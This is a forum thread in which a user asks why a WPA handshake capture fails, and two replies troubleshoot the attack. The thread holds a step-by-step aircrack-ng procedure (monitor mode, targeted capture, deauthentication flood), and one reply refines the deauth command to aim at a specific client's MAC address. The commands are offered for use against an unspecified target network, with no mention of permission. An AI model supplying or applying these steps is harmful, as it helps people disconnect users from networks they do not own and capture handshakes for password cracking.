Jump to content

Recommended Posts

I have been faced by this problem , Handshake packet didnt showing plzzz some one guide me or help me to do  

I have follow these steps:

1. airmon-ng check kill

2. airmon-ng start wlan0 (here shows my realink adapter interface is wlan1mon)

3. airodump-ng wlan1mon

4.airodump-ng --bssid (target bssid) -c (chanel no of target) -w /root/Desktop/filename wlan1mon

5.aireplay-ng --deauth 10 -a (bssid same as above i paste in 4th step) wlan1mon

All is gone good here deauth packets send But above there the handshake is not been shown 

I do this method yesterday and it was sucessfully done but now today i not work

CAN SOMEONE PLZZ HELP ME ...!

 

Link to comment
Share on other sites

Are you trying it today with the same target as yesterday (i.e. the one that worked)?
Are there any clients (which will be deauthed from the access point) within the range of your wifi card (wlan1mon)?

If there are not, connect a phone or tablet or something else to the access point (using its wifi password) before undertaking the monitor / deauth.

Edited by aethernaut
clarification
Link to comment
Share on other sites

  • 2 weeks later...
On 10/6/2018 at 5:26 AM, Shavy Ansari said:

I have been faced by this problem , Handshake packet didnt showing plzzz some one guide me or help me to do  

I have follow these steps:

1. airmon-ng check kill

2. airmon-ng start wlan0 (here shows my realink adapter interface is wlan1mon)

3. airodump-ng wlan1mon

4.airodump-ng --bssid (target bssid) -c (chanel no of target) -w /root/Desktop/filename wlan1mon

5.aireplay-ng --deauth 10 -a (bssid same as above i paste in 4th step) wlan1mon

All is gone good here deauth packets send But above there the handshake is not been shown 

I do this method yesterday and it was sucessfully done but now today i not work

CAN SOMEONE PLZZ HELP ME ...!

 

Your step 5 needs improvement.

You should be targeting a particular client associated with the AP. The command in step 5 should look something like this:

aireplay-ng --deauth 10 -a xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy wlan1mon

xx = mac address of ap

yy = mac address of associated client

At the moment your step 5 will still be sending broadcast deauth requests but a lot of clients just ignore these. If you haven't included the client mac address because there aren't clients associated then there is no point in sending the deauth requests.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...